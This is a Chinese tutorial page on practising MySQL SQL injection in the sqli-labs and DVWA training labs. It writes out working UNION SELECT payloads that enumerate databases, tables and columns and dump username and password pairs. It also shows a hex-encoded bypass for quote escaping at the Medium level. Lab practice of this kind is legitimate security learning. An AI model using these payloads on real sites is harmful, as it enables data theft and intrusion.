首页
所有分类
TAGS
文字工具 EMOJI BIBLE
数据库 MySQL

MySQL注入基础练习

Posted in MySQL onMay 30, 2021

以sqli-labs-master作为练习

初始:简单获取基础内容

第一步,使用拼接的方式决定注入类型

MySQL注入基础练习

第二部,使用order by确定有表单有几列值

order by根据指定的列对结果集进行排序

MySQL注入基础练习

第三步,使用union select 来找到内容,获取想要得到内容

union select :联合查询

MySQL注入基础练习

进阶,通过mysql注入获取表单内容,托库;

第一步:通过数据库语句进行搜索,首先确定数据库

MySQL注入基础练习

第二部:确定数据库后,爆出它的表;

MySQL注入基础练习

第三步:确定表以后,可根据实际需求爆表,这里以users举例,进行爆字段

MySQL注入基础练习

第四部:确定字段后,我们就可以拖库;

MySQL注入基础练习

DVWA训练基础 low级别

1.参照上文确定当前库

1' union select (select database()),2 -- -

MySQL注入基础练习

2.确定库后,爆表

1' union select (select group_concat(table_name) from information_schema.tables where table_schema = 'dvwa'),2 -- -

MySQL注入基础练习

3.确定表后,爆字段

1' union select (select group_concat(column_name) from information_schema.columns where table_schema = 'dvwa' and table_name='users'),2 -- -

MySQL注入基础练习

4.确定字段后,进行拖库

1' union select (select group_concat(concat_ws(0x7e,user,password))from users),2 -- -

MySQL注入基础练习

级别Medium

与low级别不同,没有输入框,只有选择项,所以需要借助bp工具

MySQL注入基础练习

1.打开代理使用bp进行抓包并发送到Repeater模块进行反复验证

MySQL注入基础练习

2.其余步骤参考上文:暴库

MySQL注入基础练习

爆表

ps:因为后台强制转译的问题,要注意避免单引号

MySQL注入基础练习

爆字段

同爆表,因为转译的问题,要注意避免引号,可使用编译规避;

1 union  select 1,(select group_concat(column_name) from information_schema.columns where table_schema = (select database()) and table_name=0x7573657273)

MySQL注入基础练习

拖库

MySQL注入基础练习

MySQL注入基础练习

- Author -

纪迁辰

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

MySQL 相关文章推荐
MySQL表的增删改查基础教程
Apr 07 MySQL
mysql的MVCC多版本并发控制的实现
Apr 14 MySQL
jdbc使用PreparedStatement批量插入数据的方法
Apr 27 MySQL
MySQL sql_mode修改不生效的原因及解决
May 07 MySQL
MySQL 自定义变量的概念及特点
May 13 MySQL
mysql在项目中怎么选事务隔离级别
May 25 MySQL
MySQL 时间类型的选择
Jun 05 MySQL
MySQL 聚合函数排序
Jul 16 MySQL
MySQL数据库必备之条件查询语句
Oct 15 MySQL
Mysql数据库手动及定时备份步骤
Nov 07 MySQL
mysql中数据库覆盖导入的几种方式总结
Mar 25 MySQL
MySQL的存储函数与存储过程的区别解析
Apr 08 MySQL
解决Navicat for MySQL 连接 MySQL 报2005错误的问题
MYSQL(电话号码,身份证)数据脱敏的实现
May 28 #MySQL
MySql开发之自动同步表结构
mysql升级到5.7时,wordpress导数据报错1067的问题
May 27 #MySQL
解决Navicat for Mysql连接报错1251的问题(连接失败)
Navicat for MySQL的使用教程详解
MySQL Router实现MySQL的读写分离的方法
R601SW(1) 军机(1) S900(1) E1-XM(1) VOLVO(1) ETON(1) 66-XI(1) MOTOROLA(1) 摩托罗拉(1) 沃尔沃(1)
You might like
PHP+MySQL5.0中文乱码解决方法
2006/11/20 PHP
PHP实现蛇形矩阵,回环矩阵及数字螺旋矩阵的方法分析
2017/05/29 PHP
Laravel框架中VerifyCsrfToken报错问题的解决
2017/08/30 PHP
js中document.getElementByid、document.all和document.layers区分介绍
2011/12/08 Javascript
屏蔽IE弹出"您查看的网页正在试图关闭窗口,是否关闭此窗口"的方法
2013/12/31 Javascript
用javascript关闭本窗口技巧小结
2014/09/05 Javascript
基于jQuery实现复选框是否选中进行答题提示
2015/12/10 Javascript
JQuery中Ajax()的data参数类型实例分析
2015/12/15 Javascript
jQuery 如何给Carousel插件添加新的功能
2016/04/18 Javascript
JavaScript禁止复制与粘贴的实现代码
2016/05/16 Javascript
详解使用PM2管理nodejs进程
2017/10/24 NodeJs
微信小程序中吸底按钮适配iPhone X方案
2017/11/29 Javascript
浅析Vue 和微信小程序的区别、比较
2018/08/03 Javascript
vue加载完成后的回调函数方法
2018/09/07 Javascript
vue+axios实现文件下载及vue中使用axios的实例
2018/09/21 Javascript
JS实现给数组对象排序的方法分析
2019/06/24 Javascript
JQuery基于FormData异步提交数据文件
2020/09/01 jQuery
Python统计列表中的重复项出现的次数的方法
2014/08/18 Python
Python使用ConfigParser模块操作配置文件的方法
2018/06/29 Python
pandas中apply和transform方法的性能比较及区别介绍
2018/10/30 Python
在python中利用最小二乘拟合二次抛物线函数的方法
2018/12/29 Python
搭建python django虚拟环境完整步骤详解
2019/07/08 Python
python用线性回归预测股票价格的实现代码
2019/09/04 Python
python/Matplotlib绘制复变函数图像教程
2019/11/21 Python
Python 写了个新型冠状病毒疫情传播模拟程序
2020/02/14 Python
解析html5 canvas实现背景鼠标连线动态效果代码
2019/06/17 HTML / CSS
我的applet原先好好的, 一放到web server就会有问题,为什么?
2016/05/10 面试题
List, Set, Map是否继承自Collection接口?
2016/05/16 面试题
文秘专业个人求职信
2013/12/22 职场文书
保证书范文大全
2014/04/28 职场文书
鼓舞士气的口号
2014/06/16 职场文书
党员领导干部民主生活会批评与自我批评发言
2014/09/28 职场文书
高三毕业评语
2014/12/31 职场文书
思想政治表现评语
2015/01/04 职场文书
2015年英语教学工作总结
2015/05/25 职场文书
2020优秀员工演讲稿(三篇)
2019/10/17 职场文书